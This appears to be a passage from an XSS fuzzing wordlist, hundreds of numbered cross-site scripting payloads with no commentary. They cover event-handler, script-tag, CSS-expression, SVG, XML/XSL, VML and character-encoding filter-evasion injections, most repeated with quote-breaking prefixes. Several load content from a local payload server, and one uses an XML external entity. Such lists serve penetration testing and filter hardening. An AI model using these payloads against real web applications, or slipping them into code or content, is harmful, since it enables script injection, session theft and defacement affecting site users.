  1786. <comment><img src="</comment><img src=x onerror=alert(1))//">
  1787. "><comment><img src="</comment><img src=x onerror=alert(1))//">
  1788. '><comment><img src="</comment><img src=x onerror=alert(1))//">
  1789. <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
  1790. "><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
  1791. '><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
  1792. <style><img src="</style><img src=x onerror=alert(1)//">
  1793. "><style><img src="</style><img src=x onerror=alert(1)//">
  1794. '><style><img src="</style><img src=x onerror=alert(1)//">
  1795. <li style=list-style:url() onerror=alert(1)></li>
  1796. "><li style=list-style:url() onerror=alert(1)></li>
  1797. '><li style=list-style:url() onerror=alert(1)></li>
  1798. <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  1799. "><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  1800. '><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
  1801. "><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  1802. "><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  1803. '><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
  1804. '><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  1805. "><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>
  1806. '><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
  1807. <a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
  1808. "><a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
  1809. '><a style="-o-link:'javascript:alert(1)';-o-link-source:current">X</a>
  1810. <style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
  1811. "><style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
  1812. '><style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>
  1813. <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
  1814. "><link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
  1815. '><link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d
  1816. <style>@import "data:,*%7bx:expression(write(1))%7D";</style>
  1817. "><style>@import "data:,*%7bx:expression(write(1))%7D";</style>
  1818. '><style>@import "data:,*%7bx:expression(write(1))%7D";</style>
  1819. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
  1820. "><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
  1821. '><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>
  1822. <style>*[{}@import'test.css?]{color: green;}</style>X
  1823. "><style>*[{}@import'test.css?]{color: green;}</style>X
  1824. '><style>*[{}@import'test.css?]{color: green;}</style>X
  1825. * {-o-link:'javascript:alert(1)';-o-link-source: current;}
  1826. <div style="font-family:'foo[a];color:red;';">XXX</div>
  1827. "><div style="font-family:'foo[a];color:red;';">XXX</div>
  1828. '><div style="font-family:'foo[a];color:red;';">XXX</div>
  1829. <div style="font-family:foo}color=red;">X
  1830. "><div style="font-family:foo}color=red;">X
  1831. '><div style="font-family:foo}color=red;">XXX</div>
  1832. "><div style="font-family:foo}color=red;">X
  1833. "><div style="font-family:foo}color=red;">X
  1834. '><div style="font-family:foo}color=red;">XXX</div>
  1835. '><div style="font-family:foo}color=red;">X
  1836. "><div style="font-family:foo}color=red;">X
  1837. '><div style="font-family:foo}color=red;">XXX</div>
  1838. <div style="[a]color[b]:[c]red">XXX</div>
  1839. "><div style="[a]color[b]:[c]red">XXX</div>
  1840. '><div style="[a]color[b]:[c]red">XXX</div>
  1841. <div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>
  1842. "><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>
  1843. '><div style="\63&#9\06f&#10\0006c&#12\00006F&#13\R:\000072 Ed;color\0\bla:yellow\0\bla;col\0\00 \&#xA0or:blue;">XXX</div>
  1844. <// style=x:expression\28write(1)\29>
  1845. "><// style=x:expression\28write(1)\29>
  1846. '><// style=x:expression\28write(1)\29>
  1847. <style>*{x:expression(write(1))}</style>
  1848. "><style>*{x:expression(write(1))}</style>
  1849. '><style>*{x:expression(write(1))}</style>
  1850. <div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
  1851. "><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
  1852. '><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>
  1853. <div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
  1854. "><div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
  1855. '><div style="list-style:url(http://foo.f)\20url(javascript:alert(1));">X</div>
  1856. <div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  1857. "><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  1858. '><div id=d><div style="font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
  1859. <div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
  1860. "><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
  1861. '><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>
  1862. <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  1863. "><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  1864. '><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
  1865. "><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  1866. "><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  1867. '><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
  1868. '><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  1869. "><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
  1870. '><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>
  1871. <x style="background:url('x[a];color:red;/*')">XXX</x>
  1872. "><x style="background:url('x[a];color:red;/*')">XXX</x>
  1873. '><x style="background:url('x[a];color:red;/*')">XXX</x>
  1874. <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
  1875. "><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
  1876. '><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
  1877. <script>({0:#0=alert/#0#/#0#(1)})</script>
  1878. "><script>({0:#0=alert/#0#/#0#(1)})</script>
  1879. '><script>({0:#0=alert/#0#/#0#(1)})</script>
  1880. <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
  1881. "><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
  1882. '><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>
  1883. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  1884. "><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  1885. '><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
  1886. <script>history.pushState(0,0,'/i/am/somewhere_else');</script>
  1887. "><script>history.pushState(0,0,'/i/am/somewhere_else');</script>
  1888. '><script>history.pushState(0,0,'/i/am/somewhere_else');</script>
  1889. <script src="#">{alert(1)}</script>;1
  1890. "><script src="#">{alert(1)}</script>;1
  1891. '><script src="#">{alert(1)}</script>;1
  1892. +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
  1893. <b><script<b></b><alert(1)</script </b></b>
  1894. "><b><script<b></b><alert(1)</script </b></b>
  1895. '><b><script<b></b><alert(1)</script </b></b>
  1896. <script<{alert(1)}/></script </>
  1897. "><script<{alert(1)}/></script </>
  1898. '><script<{alert(1)}/></script </>
  1899. 0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
  1900. <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  1901. "><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  1902. '><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
  1903. <script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
  1904. "><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
  1905. '><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
  1906. <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg
  1907. "><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg
  1908. '><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg
  1909. <svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script>
  1910. "><script>alert(1)</script>
  1911. '><script>alert(1)</script></svg>
  1912. <svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
  1913. "><svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
  1914. '><svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
  1915. <iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
  1916. "><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
  1917. '><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>
  1918. <svg><style>&lt;img/src=x onerror=alert(1)// </b>
  1919. "><svg><style>&lt;img/src=x onerror=alert(1)// </b>
  1920. '><svg><style>&lt;img/src=x onerror=alert(1)// </b>
  1921. <?xml-stylesheet href="javascript:alert(1)"?><root/>
  1922. "><?xml-stylesheet href="javascript:alert(1)"?><root/>
  1923. '><?xml-stylesheet href="javascript:alert(1)"?><root/>
  1924. <script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
  1925. "><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
  1926. '><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
  1927. <!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>
  1928. "><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>
  1929. '><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>
  1930. <script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
  1931. "><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
  1932. '><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>
  1933. <?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
  1934. "><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
  1935. '><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
  1936. <?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>
  1937. "><?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>
  1938. '><?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>
  1939. <!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">
  1940. "><!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">
  1941. '><!ENTITY x "&#x3C;html:img&#x20;src='x'&#x20;xmlns:html='http://www.w3.org/1999/xhtml'&#x20;onerror='alert(1)'/&#x3E;">
  1942. X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
  1943. 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>
  1944. 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>
  1945. 1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#X></vmlframe>
  1946. <xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>
  1947. "><xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>
  1948. '><xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>
  1949. 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
  1950. <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
  1951. "><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
  1952. '><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
  1953. <x style="behavior:url(test.sct)">
  1954. "><x style="behavior:url(test.sct)">
  1955. '><x style="behavior:url(test.sct)">
  1956. <SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>
  1957. "><SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>
  1958. '><SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>
  1959. <xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>
  1960. "><xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>
  1961. '><xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>
  1962. <?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>
  1963. "><?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>
  1964. '><?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>
  1965. <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
  1966. "><?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
  1967. '><?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
  1968. object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
  1969. class X {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||"javascript:alert(1)"),flash.Lib._root.name||"_top"); }}
  1970. <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  1971. "><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  1972. '><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
  1973. <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1974. "><body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1975. '><body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1976. X<form id=test onforminput=javascript:alert(1)><input></form>
  1977. X<form id=test><input></form><button form=test onformchange==javascript:alert(1)>X
  1978. <input onblur=write(1) autofocus><input autofocus>
  1979. "><input onblur=write(1) autofocus><input autofocus>
  1980. '><input onblur=write(1) autofocus><input autofocus>
  1981. <video onerror="javascript:alert(1)"><source>
  1982. "><video onerror="javascript:alert(1)"><source>
  1983. '><video onerror="javascript:alert(1)"><source>
  1984. <q/oncut=open()>
  1985. "><q/oncut=open()>
  1986. '><q/oncut=open()>
  1987. <marquee<marquee/onstart=confirm(1)>
  1988. "><marquee/onstart=confirm(1)>
  1989. '><marquee/onstart=confirm(1)>/onstart=confirm(1)>
  1990. <body language=vbsonload=alert-1
  1991. "><body language=vbsonload=alert-1
  1992. '><body language=vbsonload=alert-1
  1993. <command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>
  1994. "><command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>
  1995. '><command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>
  1996. <q/oncut=alert(1)>
  1997. "><q/oncut=alert(1)>
  1998. '><q/oncut=alert(1)>
  1999. eval("aler"+(!![]+[])[+[]])("X")
  2000. window["alert"]("X")
  2001. this['ale'+(!![]+[])[-~[]]+(!![]+[])[+[]]]()
  2002. < %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \x3c \x3C \u003c \u003C
  2003. ">< %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \x3c \x3C \u003c \u003C
  2004. '>< %3C &lt &lt; &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 &#60; &#060; &#0060; &#00060; &#000060; &#0000060; &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c &#x3c; &#x03c; &#x003c; &#x0003c; &#x00003c; &#x000003c; &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c &#X3c; &#X03c; &#X003c; &#X0003c; &#X00003c; &#X000003c; &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C &#x3C; &#x03C; &#x003C; &#x0003C; &#x00003C; &#x000003C; &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C &#X3C; &#X03C; &#X003C; &#X0003C; &#X00003C; &#X000003C; \x3c \x3C \u003c \u003C
  2005. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>
  2006. "><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>
  2007. '><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">X</A>
  2008. <A HREF="http://1113982867/">X</A>
  2009. "><A HREF="http://1113982867/">X</A>
  2010. '><A HREF="http://1113982867/">X</A>
  2011. <A HREF="h tt p://6&#09;6.000146.0x7.147/">X</A>
  2012. "><A HREF="h tt p://6&#09;6.000146.0x7.147/">X</A>
  2013. '><A HREF="h tt p://6&#09;6.000146.0x7.147/">X</A>
  2014. <A HREF="//google">X</A>
  2015. "><A HREF="//google">X</A>
  2016. '><A HREF="//google">X</A>
  2017. <A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A
  2018. "><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A
  2019. '><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html@google">X</A
  2020. <A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>
  2021. "><A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>
  2022. '><A HREF="http://google:127.0.0.1:3555/xss_serve_payloads/X.html">X</A>
  2023. document.write('<iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" style="border: 0; width: 100%; height: 100%"></iframe>')
  2024. http://%22%20onerror=%22alert%281%29;//
  2025. document.location='http://127.0.0.1:3555/xss_serve_payloads/X.html'
  2026. document.location="http://127.0.0.1:3555/xss_serve_payloads/X.html"
  2027. \"><script>alert(/X/)<script>
  2028. ;alert%28String.fromCharCode%2875,67,70%29%29//\%27;alert%28String.fromCharCode%2875,67,70%29%29//%22;alert%28String.fromCharCode%2875,67,70%29%29//\%22;alert%28String.fromCharCode%2875,67,70%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2875,67,70%29%29%3C/SCRIPT%3E
  2029. <input onfocus=write(1) autofocus>
  2030. "><input onfocus=write(1) autofocus>
  2031. '><input onfocus=write(1) autofocus>
  2032. <video poster=javascript:alert(1)//></video>
  2033. "><video poster=javascript:alert(1)//></video>
  2034. '><video poster=javascript:alert(1)//></video>
  2035. <video poster=prompt(1)//></video>
  2036. "><video poster=prompt(1)//></video>
  2037. '><video poster=prompt(1)//></video>
  2038. <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  2039. "><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  2040. '><body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  2041. <body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  2042. "><body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  2043. '><body onscroll=prompt(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  2044. <form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>
  2045. "><form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>
  2046. '><form id=test onforminput=prompt(1)><input></form><button form=test onformchange=prompt(2)>X</button>
  2047. <video><source onerror="alert(1)">
  2048. "><video><source onerror="alert(1)">
  2049. '><video><source onerror="alert(1)">
  2050. <video><source onerror="prompt(1)">
  2051. "><video><source onerror="prompt(1)">
  2052. '><video><source onerror="prompt(1)">
  2053. <video><source onerror="prompt(1)">
  2054. "><video><source onerror="prompt(1)">
  2055. '><video><source onerror="prompt(1)"></source></video>
  2056. "><video><source onerror="prompt(1)"></source></video>
  2057. '><video><source onerror="prompt(1)"></source></video>
  2058. <form><button formaction="javascript:alert(1)">X</button>
  2059. "><form><button formaction="javascript:alert(1)">X</button>
  2060. '><form><button formaction="javascript:alert(1)">X</button>
  2061. <body oninput=alert(1)><input autofocus>
  2062. "><body oninput=alert(1)><input autofocus>
  2063. '><body oninput=alert(1)><input autofocus>
  2064. <body oninput=prompt(1)><input autofocus>
  2065. "><body oninput=prompt(1)><input autofocus>
  2066. '><body oninput=prompt(1)><input autofocus>
  2067. <frameset onload=prompt(1)>
  2068. "><frameset onload=prompt(1)>
  2069. '><frameset onload=prompt(1)>
  2070. <comment><img src="</comment><img src=x onerror=alert(1)//">
  2071. "><comment><img src="</comment><img src=x onerror=alert(1)//">
  2072. '><comment><img src="</comment><img src=x onerror=alert(1)//">
  2073. <comment><img src="</comment><img src=x onerror=prompt(1)//">
  2074. "><comment><img src="</comment><img src=x onerror=prompt(1)//">
  2075. '><comment><img src="</comment><img src=x onerror=prompt(1)//">
  2076. <style><img src="</style><img src=x onerror=prompt(1)//">
  2077. "><style><img src="</style><img src=x onerror=prompt(1)//">
  2078. '><style><img src="</style><img src=x onerror=prompt(1)//">
  2079. <SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>
  2080. "><SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>
  2081. '><SCRIPT FOR=document EVENT=onreadystatechange>prompt(1)</SCRIPT>
  2082. <div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>
  2083. "><div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>
  2084. '><div style=width:1px;filter:glow onfilterchange=prompt(1)>x</div>
  2085. <img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">
  2086. "><img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">
  2087. '><img[a][b]src=x[d]onerror[c]=[e]"prompt(1)">
  2088. '-prompt(1)'
  2089. '-alert(1)-'
  2090. ';alert(String.fromCharCode(75,67,70))//';alert(String.fromCharCode(75,67,70))//";
  2091. alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>
  2092. <IMG SRC=# onmouseover="alert('X')">
  2093. "><IMG SRC=# onmouseover="alert('X')">
  2094. '><IMG SRC=# onmouseover="alert('X')">
